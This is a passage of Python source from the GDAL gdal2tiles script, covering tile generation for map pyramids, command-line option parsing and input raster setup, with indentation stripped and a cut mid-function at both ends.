f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
return dataset.RasterCount
def create_base_tile(tile_job_info, tile_detail):
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tile_size = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
cached_ds = getattr(threadLocal, 'cached_ds', None)
if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
ds = cached_ds
else:
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
threadLocal.cached_ds = ds
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tile_size, tile_size, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# Query is in 'nearest neighbour' but can be bigger in then the tile_size
# We scale down the query to the tile_size by supplied algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# Detect totally transparent tile and skip its creation
if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
return
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount + 1)))
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tile_size == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tile_size - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
swne = get_tile_swne(tile_job_info, options)
if swne is not None:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % GDAL2Tiles.getYTile(ty, tz, options))
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
swne, tile_job_info.options
).encode('utf-8'))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
ytile = GDAL2Tiles.getYTile(ty, tz, options)
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ytile, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
ytile2 = GDAL2Tiles.getYTile(y, tz+1, options)
base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (ytile2, tile_job_info.tile_extension))
if not os.path.isfile(base_tile_path):
continue
dsquerytile = gdal.Open(
base_tile_path,
gdal.GA_ReadOnly)
if x == 2*tx:
tileposx = 0
else:
tileposx = tile_job_info.tile_size
if options.xyz and options.profile == 'raster':
if y == 2*ty:
tileposy = 0
else:
tileposy = tile_job_info.tile_size
else:
if y == 2*ty:
tileposy = tile_job_info.tile_size
else:
tileposy = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
if children:
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
swne = get_tile_swne(tile_job_info, options)
if swne is not None:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ytile)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
swne, options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option('-z', '--zoom', dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option('-e', '--resume', dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
help="Value in the input dataset considered as transparent")
p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option('--xyz',
action='store_true', dest='xyz',
help="Use XYZ tile numbering (OSM Slippy Map tiles) instead of TMS")
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-x", "--exclude",
action="store_true", dest="exclude_transparent",
help="Exclude transparent tiles from result tileset")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
p.add_option("--tilesize", dest="tilesize", metavar="PIXELS", default=256,
type='int',
help="Width and height in pixel of a tile")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
# MapML options
g = OptionGroup(p, "MapML options",
"Options for generated MapML file")
g.add_option("--mapml-template", dest='mapml_template', action="store_true",
help=("Filename of a template mapml file where variables will "
"be substituted. If not specified, the generic "
"template_tiles.mapml file from GDAL data resources "
"will be used"))
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if not args:
exit_with_error("You need to specify at least an input file as argument to the script")
if len(args) > 2:
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
# Directory with input filename without extension in actual directory
output_folder = os.path.splitext(os.path.basename(input_file))[0]
if options.webviewer == 'mapml':
options.xyz = True
if options.profile == 'geodetic':
options.tmscompatible = True
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'antialias' and not numpy_available:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
exclude_transparent = False
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
self.isepsg4326 = None
self.in_srs = None
self.in_srs_wkt = None
# Tile format
self.tile_size = 256
if options.tilesize:
self.tile_size = options.tilesize
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp()
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big should be query window be for scaling down
# Later on reset according the chosen resampling algorithm
self.querysize = 4 * self.tile_size
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tile_size
elif self.options.resampling == 'bilinear':
self.querysize = self.tile_size * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
if int(zoom_max) < self.tminz:
raise Exception('max zoom (%d) less than min zoom (%d)' %
(int(zoom_max), self.tminz))
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?" %
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
if input_dataset.GetRasterBand(1).DataType != gdal.GDT_Byte:
exit_with_error(
"Please convert this file to 8-bit and run gdal2tiles on the result.",
"To scale pixel values you can use:\n"
"gdal_translate -of VRT -ot Byte -scale %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
self.in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(self.in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile != 'raster':
if not self.in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs EPSG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((self.in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, self.in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
gdal.GetDriverByName('VRT').CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
srs4326.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behavior, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator(tile_size=self.tile_size)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
self.tminz = min(self.tminz, self.tmaxz)
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
elif self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible, tile_size=self.tile_size)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
self.tminz = min(self.tminz, self.tmaxz)
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
elif self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = max(0, int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size))))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
elif self.tmaxz > self.nativezoom:
print('Clamping max zoom level to %d' % self.nativezoom)
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0**(self.nativezoom - tz) * self.tile_size
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(self.in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x * self.tile_size * pixelsizex
east = west + self.tile_size * pixelsizex
if self.options.xyz:
north = self.omaxy - y * self.tile_size * pixelsizex
south = north - self.tile_size * pixelsizex
else:
south = self.ominy + y * self.tile_size * pixelsizex
north = south + self.tile_size * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tms = tmsMap[self.options.profile]
# Function which generates SWNE in LatLong for given tile
self.tileswne = None # not implemented
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, tms.level_count+1))
for tz in range(0, tms.level_count+1):
tminx, tminy = tms.GeorefCoordToTileCoord(self.ominx, self.ominy, tz, self.tile_size)
tmaxx, tmaxy = tms.GeorefCoordToTileCoord(self.omaxx, self.omaxy, tz, self.tile_size)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(tms.matrix_width * 2**tz - 1, tmaxx), min(tms.matrix_height * 2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = tms.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size), self.tile_size)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = tms.ZoomForPixelSize(self.out_gt[1], self.tile_size)
self.tminz = min(self.tminz, self.tmaxz)
if self.options.verbose:
print("Bounds (georef):", self.ominx, self.ominy, self.omaxx, self.omaxy)
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:", self.tmaxz)
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
else:
self.swne = None
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.xyz and self.swne is not None and (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml'))):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
# Generate mapml file
if self.options.webviewer in ('all', 'mapml') and \
self.options.xyz and \
self.options.profile != 'raster' and \
(self.options.profile != 'geodetic' or self.options.tmscompatible) and \
(not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'mapml.mapml'))):
with open(os.path.join(self.output_folder, 'mapml.mapml'), 'wb') as f:
f.write(self.generate_mapml().encode('utf-8'))
if self.kml and self.tileswne is not None:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tile_size, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
